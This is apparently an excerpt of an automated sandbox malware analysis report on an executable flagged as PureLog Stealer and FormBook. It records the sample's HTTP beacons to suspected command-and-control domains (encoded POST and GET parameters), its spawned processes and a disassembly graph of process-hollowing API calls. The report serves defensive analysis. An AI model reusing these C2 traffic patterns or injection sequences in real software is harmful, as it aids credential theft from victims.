                                                                                                                                      Jan 11, 2025 09:40:14.250885963 CET439OUTGET /vfw3/?sTS=rqg4sojPN1HzbyOnDHJ3Cr7oIHIM290cauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXd9S1SYp7SdNfp3f2O4BoE1UQty0MmYBNPM=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:40:14.833726883 CET1056INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:40:14 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fS7W5D9RuPmSFNyO6FHSzRPFDM5X5y0K5uMzRrpGxjwA3gb82qWOuP0M6SmBXAvLGYobPvK5TuG8BVTLpan7SQqTD7xBDwmP7DiPRIq5yIINQFJFPUYgldg%2BUrKxN5O1mLPw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900399d39bf78c0f-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1881&min_rtt=1881&rtt_var=940&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=439&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 31 30 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 61 73 74 65 72 71 71 2e 70 72 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 106<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.masterqq.pro Port 80</address></body></html>0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      58192.168.2.45006613.248.169.4880
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:40:19.870510101 CET699OUTPOST /ve8l/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.hasan.cloud
                                                                                                                                      Referer: http://www.hasan.cloud/ve8l/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 37 41 72 59 4f 33 37 4b 64 4e 56 2f 74 7a 54 5a 4d 79 33 59 64 30 5a 62 32 64 5a 30 36 37 48 38 56 44 62 76 56 33 53 47 5a 38 4e 54 6b 78 49 2b 41 4a 77 63 44 6a 47 2b 62 75 44 38 51 4d 4f 6a 49 43 76 4a 44 56 33 56 46 67 75 62 4d 4c 4b 63 72 76 67 74 74 33 6a 68 50 35 56 33 67 39 71 4e 72 68 4a 59 58 51 72 4f 76 34 31 6f 55 61 7a 41 4f 2b 4d 34 31 4a 52 4b 73 39 6f 7a 44 51 4c 77 76 46 58 71 33 4d 54 76 2f 56 72 69 53 41 7a 71 58 78 6e 69 73 4d 45 58 7a 4d 70 38 36 69 61 63 76 76 30 61 70 79 58 6d 78 76 48 69 78 4f 6d 66 6b 2b 2f 47 70 44 45 48 46 41 37 4a 59 59 44 2b 75 77 3d 3d
                                                                                                                                      Data Ascii: sTS=7ArYO37KdNV/tzTZMy3Yd0Zb2dZ067H8VDbvV3SGZ8NTkxI+AJwcDjG+buD8QMOjICvJDV3VFgubMLKcrvgtt3jhP5V3g9qNrhJYXQrOv41oUazAO+M41JRKs9ozDQLwvFXq3MTv/VriSAzqXxnisMEXzMp86iacvv0apyXmxvHixOmfk+/GpDEHFA7JYYD+uw==
                                                                                                                                      Jan 11, 2025 09:40:20.327718973 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      59192.168.2.45006713.248.169.4880
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:40:22.414813995 CET719OUTPOST /ve8l/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.hasan.cloud
                                                                                                                                      Referer: http://www.hasan.cloud/ve8l/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 37 41 72 59 4f 33 37 4b 64 4e 56 2f 73 51 4c 5a 41 7a 33 59 63 55 5a 55 35 39 5a 30 6a 72 48 43 56 44 6e 76 56 32 6d 73 5a 75 70 54 6b 52 34 2b 42 4d 63 63 41 6a 47 2b 54 4f 44 35 64 73 4f 6f 49 43 6a 42 44 58 54 56 46 6a 53 62 4d 4a 69 63 71 59 55 75 75 48 6a 6a 41 5a 56 31 39 74 71 4e 72 68 4a 59 58 51 4f 70 76 34 64 6f 55 76 6a 41 4f 63 30 33 72 5a 52 4a 38 4e 6f 7a 4f 77 4c 30 76 46 58 55 33 4a 79 4b 2f 58 6a 69 53 46 58 71 55 6a 50 39 6d 4d 45 52 33 4d 6f 56 71 58 7a 53 32 74 78 71 68 68 33 36 38 37 62 76 30 49 72 46 31 50 65 52 37 44 67 30 59 48 79 39 56 62 2b 33 31 34 38 48 53 76 64 6c 78 2f 62 47 42 37 48 66 75 59 57 63 54 37 49 3d
                                                                                                                                      Data Ascii: sTS=7ArYO37KdNV/sQLZAz3YcUZU59Z0jrHCVDnvV2msZupTkR4+BMccAjG+TOD5dsOoICjBDXTVFjSbMJicqYUuuHjjAZV19tqNrhJYXQOpv4doUvjAOc03rZRJ8NozOwL0vFXU3JyK/XjiSFXqUjP9mMER3MoVqXzS2txqhh3687bv0IrF1PeR7Dg0YHy9Vb+3148HSvdlx/bGB7HfuYWcT7I=
                                                                                                                                      Jan 11, 2025 09:40:22.859435081 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      60192.168.2.45006813.248.169.4880
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:40:24.961946011 CET10801OUTPOST /ve8l/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.hasan.cloud
                                                                                                                                      Referer: http://www.hasan.cloud/ve8l/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Raw: 73 54 53 3d 37 41 72 59 4f 33 37 4b 64 4e 56 2f 73 51 4c 5a 41 7a 33 59 63 55 5a 55 35 39 5a 30 6a 72 48 43 56 44 6e 76 56 32 6d 73 5a 75 68 54 6b 43 77 2b 42 76 6b 63 42 6a 47 2b 51 4f 44 34 64 73 4f 31 49 43 37 2f 44 58 65 6f 46 6d 65 62 4f 6f 43 63 74 70 55 75 31 33 6a 6a 59 70 56 6f 67 39 71 55 72 68 35 63 58 51 2b 70 76 34 64 6f 55 75 54 41 5a 65 4d 33 70 5a 52 4b 73 39 6f 2f 44 51 4b 72 76 46 65 76 33 4a 2b 30 34 6e 44 69 54 6a 33 71 53 51 6e 39 71 4d 45 54 36 73 6f 4e 71 58 33 5a 32 74 73 54 68 67 54 41 38 38 7a 76 31 39 32 34 79 75 71 4b 70 51 49 76 4f 31 57 61 65 35 65 6e 78 6f 77 4e 44 39 4a 6d 68 37 4b 6b 50 62 36 48 39 71 76 66 47 4f 55 35 31 6d 36 4d 72 32 44 4a 50 77 45 4c 57 69 4c 75 32 4d 69 2b 6d 43 30 4d 77 56 52 6a 73 6e 69 38 4e 68 66 6e 71 6b 69 4e 35 4e 4d 75 4f 2b 41 52 4c 39 43 6f 31 61 35 54 70 2f 7a 37 4a 32 4b 59 50 71 57 67 54 53 7a 52 57 51 46 73 59 2b 32 44 45 4e 7a 4c 33 35 54 48 72 6c 45 76 76 66 6a 72 50 58 4a 6d 55 35 43 43 42 55 53 4d 47 75 2f 57 2f 70 44 2b 79 6d [TRUNCATED]
                                                                                                                                      Data Ascii: sTS=7ArYO37KdNV/sQLZAz3YcUZU59Z0jrHCVDnvV2msZuhTkCw+BvkcBjG+QOD4dsO1IC7/DXeoFmebOoCctpUu13jjYpVog9qUrh5cXQ+pv4doUuTAZeM3pZRKs9o/DQKrvFev3J+04nDiTj3qSQn9qMET6soNqX3Z2tsThgTA88zv1924yuqKpQIvO1Wae5enxowND9Jmh7KkPb6H9qvfGOU51m6Mr2DJPwELWiLu2Mi+mC0MwVRjsni8NhfnqkiN5NMuO+ARL9Co1a5Tp/z7J2KYPqWgTSzRWQFsY+2DENzL35THrlEvvfjrPXJmU5CCBUSMGu/W/pD+ymLRRLk4sNaUChPW1GhZd/OXm6xWJjIvxbVBCeJt+vYsYgUW85OFnq/ZtrVwksi8SivnSu34juln9cRhrCGAWqawDLGdKPgXVYPPZcaJ157gTsJSWApO/mC3rCLzz5B1Y1s/Spmj9Jj3/A5hDCbhXna72Qibs5+qiwGA6T7l4HlRU/M81OIWSpesxGx1OJqS1aKU2JMpEAxFB/Bl0Vvutef/O9pThXZHQFSYC/HZEJEooUd9DuA6WEP8EHF+MWg8m+uf8L0VmkXLNoxN+QG4M5gqOmRQQgQl+im6FmaEcbGkhtgq9kRkKm1V+vrfU9Bga14w/jmAfWlkh0WLRuqtGBOsZ3slcuL8NuQ3iUYptYbG2mDye0RX180ieXquqs85qyoT/aJqHdfBH5vLxDvxXVyzMRHlMkZSxKWJhP8nqE8NR6ng6j7ZG2JPd2e4V5MKU7j6YwsfyBUosPRLiwY1g4jPee3juOzXI6PxqzBbfSikIOVdkgD1ToVbjDCe/j7Ge8UlyeEbdFxKe0BkMsDn6owd4ZveCeReD8jR4QlSI48wBitrbBlaKqoS6CElVEnlHlLLCwfqPl44eLVefKh7wN6J31QUsuByR/vH3YAwr6PoPMlH/FkbbIg7LxSdX7v9OAoHyo73/bv31axKS13EQvm2pnzkI13ydGpV [TRUNCATED]


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      61192.168.2.45006913.248.169.4880
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Jan 11, 2025 09:40:27.503035069 CET438OUTGET /ve8l/?fd=Cr_TAhTpvZaLf&sTS=2CD4NCzEaM98tRHxByL6CBkb+r1SrLrNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX23D3J9NSlYassghIEyGyoqU/M/j1A+InoJ8= HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:40:27.958606005 CET377INHTTP/1.1 200 OK
                                                                                                                                      content-type: text/html
                                                                                                                                      date: Sat, 11 Jan 2025 08:40:27 GMT
                                                                                                                                      content-length: 256
                                                                                                                                      connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 66 64 3d 43 72 5f 54 41 68 54 70 76 5a 61 4c 66 26 73 54 53 3d 32 43 44 34 4e 43 7a 45 61 4d 39 38 74 52 48 78 42 79 4c 36 43 42 6b 62 2b 72 31 53 72 4c 72 4e 5a 68 4f 66 54 45 61 62 50 4f 73 6d 35 7a 34 47 4b 76 51 66 50 69 32 49 63 39 69 50 53 4b 6d 75 48 30 4c 6b 41 48 37 62 4a 47 47 6d 49 63 72 63 74 62 73 58 32 33 44 33 4a 39 4e 53 6c 59 61 73 73 67 68 49 45 79 47 79 6f 71 55 2f 4d 2f 6a 31 41 2b 49 6e 6f 4a 38 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fd=Cr_TAhTpvZaLf&sTS=2CD4NCzEaM98tRHxByL6CBkb+r1SrLrNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX23D3J9NSlYassghIEyGyoqU/M/j1A+InoJ8="}</script></head></html>


                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:03:35:50
                                                                                                                                      Start date:11/01/2025
                                                                                                                                      Path:C:\Users\user\Desktop\QsBdpe1gK5.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\QsBdpe1gK5.exe"
                                                                                                                                      Imagebase:0xe00000
                                                                                                                                      File size:798'720 bytes
                                                                                                                                      MD5 hash:4BC2F58C4AC26D5D012F166D263D3B72
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1698119849.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1701516930.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1697576288.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:03:35:52
                                                                                                                                      Start date:11/01/2025
                                                                                                                                      Path:C:\Users\user\Desktop\QsBdpe1gK5.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\QsBdpe1gK5.exe"
                                                                                                                                      Imagebase:0x630000
                                                                                                                                      File size:798'720 bytes
                                                                                                                                      MD5 hash:4BC2F58C4AC26D5D012F166D263D3B72
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1849388475.0000000001460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1850179249.0000000001570000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:03:36:00
                                                                                                                                      Start date:11/01/2025
                                                                                                                                      Path:C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe"
                                                                                                                                      Imagebase:0xb80000
                                                                                                                                      File size:140'800 bytes
                                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:03:36:01
                                                                                                                                      Start date:11/01/2025
                                                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\SysWOW64\find.exe"
                                                                                                                                      Imagebase:0xb10000
                                                                                                                                      File size:14'848 bytes
                                                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4126273747.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4126207300.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:03:36:15
                                                                                                                                      Start date:11/01/2025
                                                                                                                                      Path:C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe"
                                                                                                                                      Imagebase:0xb80000
                                                                                                                                      File size:140'800 bytes
                                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4129375797.0000000005340000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:03:36:27
                                                                                                                                      Start date:11/01/2025
                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                      Imagebase:0x7ff6bf500000
                                                                                                                                      File size:676'768 bytes
                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Disassembly

                                                                                                                                      Reset < >

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:10.2%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:227
                                                                                                                                        Total number of Limit Nodes:15
                                                                                                                                        execution_graph 35083 7309a50 35084 7309a76 35083->35084 35085 7309bdb 35083->35085 35084->35085 35087 7304268 35084->35087 35088 7309cd0 PostMessageW 35087->35088 35089 7309d3c 35088->35089 35089->35084 34915 7307e64 34916 7307ddb 34915->34916 34921 73087f7 34916->34921 34937 730885e 34916->34937 34954 73087f8 34916->34954 34917 73080b4 34922 7308812 34921->34922 34970 7308ff2 34922->34970 34979 730912c 34922->34979 34984 730954b 34922->34984 34988 7308f84 34922->34988 34992 7308e64 34922->34992 34997 7308c60 34922->34997 35002 7308d20 34922->35002 35006 730959b 34922->35006 35011 7308cfa 34922->35011 35016 73094ba 34922->35016 35021 730907a 34922->35021 35025 7308bf5 34922->35025 35030 73090b3 34922->35030 34923 730881a 34923->34917 34938 73087ec 34937->34938 34940 7308861 34937->34940 34941 7308ff2 4 API calls 34938->34941 34942 73090b3 2 API calls 34938->34942 34943 7308bf5 2 API calls 34938->34943 34944 730907a 2 API calls 34938->34944 34945 73094ba 2 API calls 34938->34945 34946 7308cfa 2 API calls 34938->34946 34947 730959b 2 API calls 34938->34947 34948 7308d20 2 API calls 34938->34948 34949 7308c60 2 API calls 34938->34949 34950 7308e64 2 API calls 34938->34950 34951 7308f84 2 API calls 34938->34951 34952 730954b 2 API calls 34938->34952 34953 730912c 2 API calls 34938->34953 34939 730881a 34939->34917 34940->34917 34941->34939 34942->34939 34943->34939 34944->34939 34945->34939 34946->34939 34947->34939 34948->34939 34949->34939 34950->34939 34951->34939 34952->34939 34953->34939 34955 7308812 34954->34955 34957 7308ff2 4 API calls 34955->34957 34958 73090b3 2 API calls 34955->34958 34959 7308bf5 2 API calls 34955->34959 34960 730907a 2 API calls 34955->34960 34961 73094ba 2 API calls 34955->34961 34962 7308cfa 2 API calls 34955->34962 34963 730959b 2 API calls 34955->34963 34964 7308d20 2 API calls 34955->34964 34965 7308c60 2 API calls 34955->34965 34966 7308e64 2 API calls 34955->34966 34967 7308f84 2 API calls 34955->34967 34968 730954b 2 API calls 34955->34968 34969 730912c 2 API calls 34955->34969 34956 730881a 34956->34917 34957->34956 34958->34956 34959->34956 34960->34956 34961->34956 34962->34956 34963->34956 34964->34956 34965->34956 34966->34956 34967->34956 34968->34956 34969->34956 34971 7308f83 34970->34971 34972 7309060 34970->34972 35035 7307588 34971->35035 35039 7307580 34971->35039 34974 7309602 34972->34974 35043 7307098 34972->35043 35047 73070a0 34972->35047 34973 7308f9e 34974->34923 34980 7309518 34979->34980 35051 7307660 34980->35051 35055 7307658 34980->35055 34981 7309536 35059 7307720 34984->35059 35063 7307718 34984->35063 34985 730956f 34990 7307580 Wow64SetThreadContext 34988->34990 34991 7307588 Wow64SetThreadContext 34988->34991 34989 7308f9e 34990->34989 34991->34989 34993 7308e6a 34992->34993 34994 7309602 34993->34994 34995 73070a0 ResumeThread 34993->34995 34996 7307098 ResumeThread 34993->34996 34994->34923 34995->34993 34996->34993 34998 7308bfc 34997->34998 35067 73079a8 34998->35067 35071 730799c 34998->35071 35075 7307810 35002->35075 35079 7307809 35002->35079 35003 7308d46 35003->34923 35007 7308d06 35006->35007 35009 7307720 WriteProcessMemory 35007->35009 35010 7307718 WriteProcessMemory 35007->35010 35008 730931d 35008->34923 35009->35008 35010->35008 35012 7308d06 35011->35012 35014 7307720 WriteProcessMemory 35012->35014 35015 7307718 WriteProcessMemory 35012->35015 35013 730931d 35013->34923 35014->35013 35015->35013 35017 7309060 35016->35017 35018 7309602 35017->35018 35019 73070a0 ResumeThread 35017->35019 35020 7307098 ResumeThread 35017->35020 35018->34923 35019->35017 35020->35017 35023 7307580 Wow64SetThreadContext 35021->35023 35024 7307588 Wow64SetThreadContext 35021->35024 35022 7309094 35022->34923 35023->35022 35024->35022 35026 7308bfb 35025->35026 35028 73079a8 CreateProcessA 35026->35028 35029 730799c CreateProcessA 35026->35029 35027 7308cdb 35027->34923 35028->35027 35029->35027 35031 73090c0 35030->35031 35033 7307720 WriteProcessMemory 35031->35033 35034 7307718 WriteProcessMemory 35031->35034 35032 73093c1 35033->35032 35034->35032 35036 73075cd Wow64SetThreadContext 35035->35036 35038 7307615 35036->35038 35038->34973 35040 7307588 Wow64SetThreadContext 35039->35040 35042 7307615 35040->35042 35042->34973 35044 73070a0 ResumeThread 35043->35044 35046 7307111 35044->35046 35046->34972 35048 73070e0 ResumeThread 35047->35048 35050 7307111 35048->35050 35050->34972 35052 73076a0 VirtualAllocEx 35051->35052 35054 73076dd 35052->35054 35054->34981 35056 7307660 VirtualAllocEx 35055->35056 35058 73076dd 35056->35058 35058->34981 35060 7307768 WriteProcessMemory 35059->35060 35062 73077bf 35060->35062 35062->34985 35064 7307768 WriteProcessMemory 35063->35064 35066 73077bf 35064->35066 35066->34985 35068 7307a31 CreateProcessA 35067->35068 35070 7307bf3 35068->35070 35072 73079a8 CreateProcessA 35071->35072 35074 7307bf3 35072->35074 35076 730785b ReadProcessMemory 35075->35076 35078 730789f 35076->35078 35078->35003 35080 7307810 ReadProcessMemory 35079->35080 35082 730789f 35080->35082 35082->35003 35090 7e40040 35091 7e4007b 35090->35091 35092 7e4006a 35090->35092 35093 7e40109 35091->35093 35096 7e40360 35091->35096 35102 7e40370 35091->35102 35098 7e40370 35096->35098 35097 7e4049e 35097->35092 35098->35097 35108 7e40e90 35098->35108 35113 7e40e7b 35098->35113 35118 7e40e48 35098->35118 35103 7e40398 35102->35103 35104 7e4049e 35103->35104 35105 7e40e90 DrawTextExW 35103->35105 35106 7e40e48 DrawTextExW 35103->35106 35107 7e40e7b DrawTextExW 35103->35107 35104->35092 35105->35104 35106->35104 35107->35104 35109 7e40ea6 35108->35109 35124 7e412a0 35109->35124 35129 7e412b0 35109->35129 35110 7e40f1c 35110->35097 35114 7e40e90 35113->35114 35116 7e412a0 DrawTextExW 35114->35116 35117 7e412b0 DrawTextExW 35114->35117 35115 7e40f1c 35115->35097 35116->35115 35117->35115 35120 7e40e4d 35118->35120 35119 7e40e7a 35119->35097 35120->35119 35122 7e412a0 DrawTextExW 35120->35122 35123 7e412b0 DrawTextExW 35120->35123 35121 7e40f1c 35121->35097 35122->35121 35123->35121 35125 7e412b0 35124->35125 35133 7e412e0 